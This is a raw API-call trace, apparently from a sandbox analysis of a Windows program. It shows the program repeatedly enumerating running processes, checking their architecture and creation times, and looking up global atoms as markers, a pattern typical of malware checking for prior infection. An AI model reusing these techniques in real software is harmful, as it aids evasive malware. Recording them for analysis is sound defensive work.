	[0086.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0086.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0086.020] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.020] CloseHandle (hObject=0x69c) returned 1
	[0086.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0086.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0086.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0086.020] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.020] CloseHandle (hObject=0x69c) returned 1
	[0086.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0086.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0086.020] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.020] CloseHandle (hObject=0x69c) returned 1
	[0086.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0086.020] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.021] CloseHandle (hObject=0x69c) returned 1
	[0086.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0086.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.021] CloseHandle (hObject=0x69c) returned 1
	[0086.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0086.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.021] CloseHandle (hObject=0x69c) returned 1
	[0086.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0086.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.021] CloseHandle (hObject=0x69c) returned 1
	[0086.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0086.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.021] CloseHandle (hObject=0x69c) returned 1
	[0086.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0086.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0086.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.022] CloseHandle (hObject=0x69c) returned 1
	[0086.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0086.022] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.022] CloseHandle (hObject=0x69c) returned 1
	[0086.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0086.022] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.022] CloseHandle (hObject=0x69c) returned 1
	[0086.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0086.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0086.022] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.022] CloseHandle (hObject=0x69c) returned 1
	[0086.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0086.022] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.022] CloseHandle (hObject=0x69c) returned 1
	[0086.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0086.022] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.022] CloseHandle (hObject=0x69c) returned 1
	[0086.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0086.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.023] CloseHandle (hObject=0x69c) returned 1
	[0086.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0086.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.023] CloseHandle (hObject=0x69c) returned 1
	[0086.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0086.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.023] CloseHandle (hObject=0x69c) returned 1
	[0086.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0086.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.023] CloseHandle (hObject=0x69c) returned 1
	[0086.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0086.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.023] CloseHandle (hObject=0x69c) returned 1
	[0086.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0086.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.024] CloseHandle (hObject=0x69c) returned 1
	[0086.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0086.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.024] CloseHandle (hObject=0x69c) returned 1
	[0086.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0086.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.024] CloseHandle (hObject=0x69c) returned 1
	[0086.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0086.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.024] CloseHandle (hObject=0x69c) returned 1
	[0086.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0086.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.024] CloseHandle (hObject=0x69c) returned 1
	[0086.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0086.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.024] CloseHandle (hObject=0x69c) returned 1
	[0086.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0086.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.025] CloseHandle (hObject=0x69c) returned 1
	[0086.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0086.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.025] CloseHandle (hObject=0x69c) returned 1
	[0086.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0086.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.025] CloseHandle (hObject=0x69c) returned 1
	[0086.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0086.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.025] CloseHandle (hObject=0x69c) returned 1
	[0086.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0086.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.025] CloseHandle (hObject=0x69c) returned 1
	[0086.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.025] CloseHandle (hObject=0x69c) returned 1
	[0086.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.026] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.026] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0086.026] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0086.026] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0086.026] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.026] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0086.026] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.027] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0086.027] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0086.027] CloseHandle (hObject=0x69c) returned 1
	[0086.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0086.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0086.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0086.027] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.027] CloseHandle (hObject=0x69c) returned 1
	[0086.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0086.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0086.027] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.027] CloseHandle (hObject=0x69c) returned 1
	[0086.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x172a8) returned 0xc0000004
	[0086.076] VirtualAlloc (lpAddress=0x0, dwSize=0x173a8, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0086.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x173a8, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0086.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0086.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0086.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0086.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0086.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0086.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0086.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0086.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0086.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0086.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0086.079] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.079] CloseHandle (hObject=0x69c) returned 1
	[0086.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0086.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0086.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0086.080] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.080] CloseHandle (hObject=0x69c) returned 1
	[0086.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0086.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0086.080] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.080] CloseHandle (hObject=0x69c) returned 1
	[0086.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0086.080] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.080] CloseHandle (hObject=0x69c) returned 1
	[0086.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0086.080] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.080] CloseHandle (hObject=0x69c) returned 1
	[0086.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0086.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.081] CloseHandle (hObject=0x69c) returned 1
	[0086.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0086.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.081] CloseHandle (hObject=0x69c) returned 1
	[0086.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0086.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.081] CloseHandle (hObject=0x69c) returned 1
	[0086.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0086.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0086.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.081] CloseHandle (hObject=0x69c) returned 1
	[0086.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0086.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.081] CloseHandle (hObject=0x69c) returned 1
	[0086.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0086.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.082] CloseHandle (hObject=0x69c) returned 1
	[0086.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0086.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0086.082] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.082] CloseHandle (hObject=0x69c) returned 1
	[0086.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0086.082] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.082] CloseHandle (hObject=0x69c) returned 1
	[0086.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0086.082] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.082] CloseHandle (hObject=0x69c) returned 1
	[0086.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0086.082] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.082] CloseHandle (hObject=0x69c) returned 1
	[0086.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0086.082] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.082] CloseHandle (hObject=0x69c) returned 1
	[0086.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0086.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.083] CloseHandle (hObject=0x69c) returned 1
	[0086.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0086.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.083] CloseHandle (hObject=0x69c) returned 1
	[0086.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0086.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.083] CloseHandle (hObject=0x69c) returned 1
	[0086.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0086.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.083] CloseHandle (hObject=0x69c) returned 1
	[0086.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0086.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.083] CloseHandle (hObject=0x69c) returned 1
	[0086.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0086.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.084] CloseHandle (hObject=0x69c) returned 1
	[0086.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0086.084] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.084] CloseHandle (hObject=0x69c) returned 1
	[0086.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0086.084] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.084] CloseHandle (hObject=0x69c) returned 1
	[0086.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0086.084] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.084] CloseHandle (hObject=0x69c) returned 1
	[0086.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0086.084] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.084] CloseHandle (hObject=0x69c) returned 1
	[0086.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0086.084] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.084] CloseHandle (hObject=0x69c) returned 1
	[0086.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0086.085] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.085] CloseHandle (hObject=0x69c) returned 1
	[0086.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0086.085] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.085] CloseHandle (hObject=0x69c) returned 1
	[0086.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0086.085] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.085] CloseHandle (hObject=0x69c) returned 1
	[0086.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.085] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.085] CloseHandle (hObject=0x69c) returned 1
	[0086.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.085] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.086] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0086.086] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0086.086] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0086.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.086] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0086.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.087] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0086.087] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0086.087] CloseHandle (hObject=0x69c) returned 1
	[0086.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0086.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0086.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0086.087] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.087] CloseHandle (hObject=0x69c) returned 1
	[0086.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0086.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0086.087] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.087] CloseHandle (hObject=0x69c) returned 1
	[0086.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x172f8) returned 0xc0000004
	[0086.134] VirtualAlloc (lpAddress=0x0, dwSize=0x173f8, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0086.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x173f8, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0086.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0086.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0086.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0086.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0086.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0086.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0086.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0086.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0086.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0086.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0086.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0086.138] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.138] CloseHandle (hObject=0x69c) returned 1
	[0086.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0086.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
